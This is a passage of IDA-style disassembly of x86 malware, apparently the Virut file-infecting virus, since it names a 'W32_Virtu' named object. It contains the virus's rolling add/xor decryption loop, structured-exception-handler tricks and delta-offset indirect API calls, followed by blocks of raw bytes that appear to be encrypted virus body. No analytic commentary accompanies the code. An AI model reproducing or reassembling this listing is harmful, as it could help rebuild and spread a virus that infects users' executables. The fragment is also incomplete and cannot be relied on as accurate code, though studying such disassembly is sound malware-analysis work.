mov [ebx+28h], ecx
loc_4218B4: ; CODE XREF: sub_4215FB+2B4�j
mov ecx, [edx+10h]
mov eax, dword ptr ss:loc_403976[ebp]
cmp [edx+8], ecx
jnb short loc_4218C5
mov [edx+8], ecx
loc_4218C5: ; CODE XREF: sub_4215FB+2C5�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+40397Ah]
push 243Ch
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+40342Fh]
test dword ptr ss:loc_403431[ebp], 10000000h
jz short loc_4218F6
add ecx, ss:dword_40106D[ebp]
loc_4218F6: ; CODE XREF: sub_4215FB+2F3�j
mov dh, 0
test dword ptr ss:loc_403431[ebp], 20000h
jnz short loc_421918
inc dh
test dword ptr ss:loc_403431[ebp], 40000h
jnz short loc_421918
mov dh, [ebp+403430h]
loc_421918: ; CODE XREF: sub_4215FB+307�j
; sub_4215FB+315�j
test dword ptr ss:loc_403431[ebp], 4000h
jnz short loc_42192F
loc_421924: ; CODE XREF: sub_4215FB+330�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_421924
jmp short loc_421938
; ---------------------------------------------------------------------------
loc_42192F: ; CODE XREF: sub_4215FB+327�j
; sub_4215FB+33B�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_42192F
loc_421938: ; CODE XREF: .data:004215F6�j
; sub_4215FB+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_4215FB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_421941 proc near ; CODE XREF: sub_4215FB+11C�p
cmp dword ptr [ebp+403956h], 0
jz locret_4214D6
push dword ptr [ebp+403972h]
call dword ptr [ebp+4035C4h]
loc_42195A: ; CODE XREF: sub_421405+C5�j
push dword ptr [ebp+40396Eh]
call dword ptr [ebp+40353Ch]
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+4035B8h]
loc_421982: ; CODE XREF: sub_421405+6B�j
; sub_421405+82�j ...
push dword ptr [ebp+403956h]
call dword ptr [ebp+40353Ch]
loc_42198E: ; CODE XREF: sub_421405+45�j
lea esi, [ebp+40384Eh]
push dword ptr ss:loc_403952[ebp]
push esi
call dword ptr [ebp+4035B4h]
and dword ptr [ebp+403956h], 0
retn
sub_421941 endp
; ---------------------------------------------------------------------------
db 0E8h, 2 dup(0)
dd 6A5D0000h, 49ED8101h, 58004033h, 85C10FF0h, 401580h
dd 83C3C085h, 0FF0FFC8h, 158085C1h, 3DC30040h, 2A0010h
dd 81661C75h, 6C0C247Ch, 60137571h, 0FFFFC4E8h, 0E80575FFh
dd 0FFFFFB7Eh, 0FFFFD2E8h, 0FF2E61FFh, 3456782Dh, 25B812h
dd 0E8600000h, 0FFFFFFA5h, 448B3975h, 0B58D3024h, 40384Eh
dd 6608508Bh, 2063A81h, 68562573h, 0FF0000h, 6AC48Bh, 95FF5052h
dd 4035F8h, 8108C483h, 3F3F5C3Eh, 8303755Ch, 2BE804C6h
dd 0E8FFFFFBh, 0FFFFFF7Fh, 74B8C361h, 0EB000000h, 2FB8B1h
dd 10E80000h, 0C2000000h, 30B80020h, 0E8000000h, 3, 8D0024C2h
dd 0CD0C2454h, 0F8832Eh, 0E860197Ch, 0
; ---------------------------------------------------------------------------
mov edx, [esp+30h]
pop ebp
mov ebx, [edx]
sub ebp, 403413h
call sub_41FFC3
popa
retn 4
; ---------------------------------------------------------------------------
dw 702h
dd 5010603h, 31808C95h, 15FF0939h, 4420F4h, 90h, 3Fh dup(0)
dd 809B4700h, 8308AD7Ch, 9103317Ch, 80ADA07Ch, 7Ch, 2 dup(0)
dd 80BDB600h, 801A247Ch, 80945C7Ch, 8023677Ch, 81042C7Ch
dd 8106377Ch, 864B0F7Ch, 80C0587Ch, 80E7EC7Ch, 81153C7Ch
dd 810A777Ch, 831C457Ch, 80B6A17Ch, 8608FF7Ch, 835DCA7Ch
dd 8111DA7Ch, 812ADE7Ch, 801D777Ch, 80B9057Ch, 80BB767Ch
dd 8309E17Ch, 863DE57Ch, 863F587Ch, 8127827Ch, 831CB87Ch
dd 8024427Ch, 810B1C7Ch, 80B9747Ch, 809A517Ch, 810D877Ch
dd 90D4607Ch, 90D6827Ch, 90D7547Ch, 90D7697Ch, 90D7937Ch
dd 90DC557Ch, 90DCFD7Ch, 90DD907Ch, 90DEB67Ch, 90EA327Ch
dd 9130C67Ch, 7Ch, 14h dup(0)
a68:
unicode 0, <68>
dw 1CBCh
aB_0 db 'B',0
dd offset loc_42005A+2
aAsenamedobject:
unicode 0, <aseNamedObjects\W32_Virtu>,0
dd 0BBh dup(0)
dd 51000000h, 0Ch dup(0)
dd 65000000h, 0D1h, 1179h dup(0)
_data ends
; Section 4. (virtual address 00027000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00026600
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 427000h
align 2000h
_idata2 ends
end start